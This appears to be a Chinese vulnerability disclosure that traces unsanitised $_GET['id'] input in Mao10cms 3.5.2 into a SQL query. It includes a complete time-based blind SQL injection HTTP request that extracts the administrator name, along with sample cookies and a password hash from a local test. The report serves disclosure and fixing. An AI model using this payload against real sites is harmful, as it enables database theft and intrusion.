### 简要描述:
Mao10cms最新版前台注入
### 详细说明:
Mao10cms用户量不小,2015-06-25更新的V3.5.2,今天来学习一下吧
这个注入问题出现在模板文件中,有多个地方引用这个模板,这里说3个漏洞,是这个问题文件中存在多个注入点引用这个出问题的文件。
问题文件在/theme/default/article/single.php,看代码
```
<?php mc_template_part('header'); ?>
<?php foreach($page as $val) : ?>
<div id="single-head-img" class="pr hidden-xs">
<div class="single-head-img shi1" style="background-image: url(<?php if(mc_fmimg($_GET['id'])) : echo mc_fmimg($_GET['id']); else : echo mc_theme_url().'/img/user_bg.jpg'; endif; ?>);"></div>
<div class="single-head-img shi2"></div>
<div class="single-head-img shi3">
<h1><?php echo mc_user_display_name($_GET['id']); ?></h1>
<h4><?php echo mc_cut_str(strip_tags(mc_magic_out(mc_get_page_field($_GET['id'],'content'))), 80); ?></h4>
</div>
</div>
<div class="container">
<div class="row">
<div class="col-sm-12 col-md-10 col-md-offset-1 col-lg-8 col-lg-offset-2">
<ul class="list-inline mb-0 article-brd">
<li>
<a href="<?php echo U('article/index/term?id='.mc_get_meta($val['id'],'term')); ?>">
<i class="glyphicon glyphicon-th-list"></i> <?php echo mc_get_page_field(mc_get_meta($val['id'],'term'),'title'); ?>
</a>
</li>
<li class="pull-right hidden-xs">
<i class="glyphicon glyphicon-time"></i> <?php echo date('m/d H:i',$val['date']); ?>
</li>
<li class="pull-right hidden-xs">
<i class="glyphicon glyphicon-eye-open"></i> <?php echo mc_views_count($val['id']); ?>
</li>
</ul>
无关代码
```
看到文件中多次引用了mc_fmimg($_GET['id']),去看看
```
//调用page封面图片
function mc_fmimg($id) {
if(mc_get_meta($id,'fmimg')) {
return mc_get_meta($id,'fmimg');
} elseif(mc_catch_that_image($id)) {
return mc_catch_that_image($id);
} else {
return mc_option('fmimg');
}
};
```
$_GET['id']进入了mc_get_meta,再去看看
```
//调用meta
function mc_get_meta($page_id,$meta_key,$array=true,$type='basic') {
$meta = M('meta')->where("page_id='$page_id' AND meta_key='$meta_key' AND type ='$type'")->order('id desc');
if($array) {
return $meta->getField('meta_value');
} else {
return $meta->getField('meta_value',true);
};
}
```
没有经过处理,可以SQL注入出任意数据
这里就找个调用该文件的url进行测试,修复时请自行查找调用该文件的地方
下面以time-based blind注入进行证明
Payload(POST提交):
```
POST /index.php?m=article&c=index&a=single&id=123')union/**/select/**/if(mid((select/**/admin_name/**/from/**/pe_admin/**/limit/**/0,1),1,1)='zs',sleep(1),0)%23 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh,zh-CN;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/index.php?m=article&c=index&a=single&id=5
Cookie: 2ev28n3dapp_admininfo=864cM2QjN%2BbkWmbIFVhnPZd5%2BrpdMp4xWzFseC%2Fbe4EBpDKafUGLY7WrakVbYuL46Bbsct6okOjqwOYiELEqJ6C9LBHCiz3RB7VTZ7XN6mwhnpI; bdshare_firstime=1430664757834; CNZZDATA1253530733=1001420044-1432556580-%7C1432556580; PHPSESSID=48jqli3eaqpfkl6i57p51pprn6; user_name=pigtest; user_pass=d0b942fd21ac7b9253a6175179ea7df9
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 4
id=5
```
当猜测错误时,如下图
[<img src="https://images.seebug.org/upload/201507/07005241289d66ac6e24f95ff143265f6356558f.jpg" alt="错误副本.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201507/07005241289d66ac6e24f95ff143265f6356558f.jpg)
当猜测正确时,如下图
[<img src="https://images.seebug.org/upload/201507/070052543e74062baffd3803af7e282af16bccec.jpg" alt="成功副本.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201507/070052543e74062baffd3803af7e282af16bccec.jpg)
整个注入过程可以使用burpsuite 或者sqlmap 再或者自己写个脚本来跑,在本地进行测试,用户名为admin,密码为f6fdffe48c908deb0f4c3bd36c032e72
### 漏洞证明:
见 详细说明
暂无评论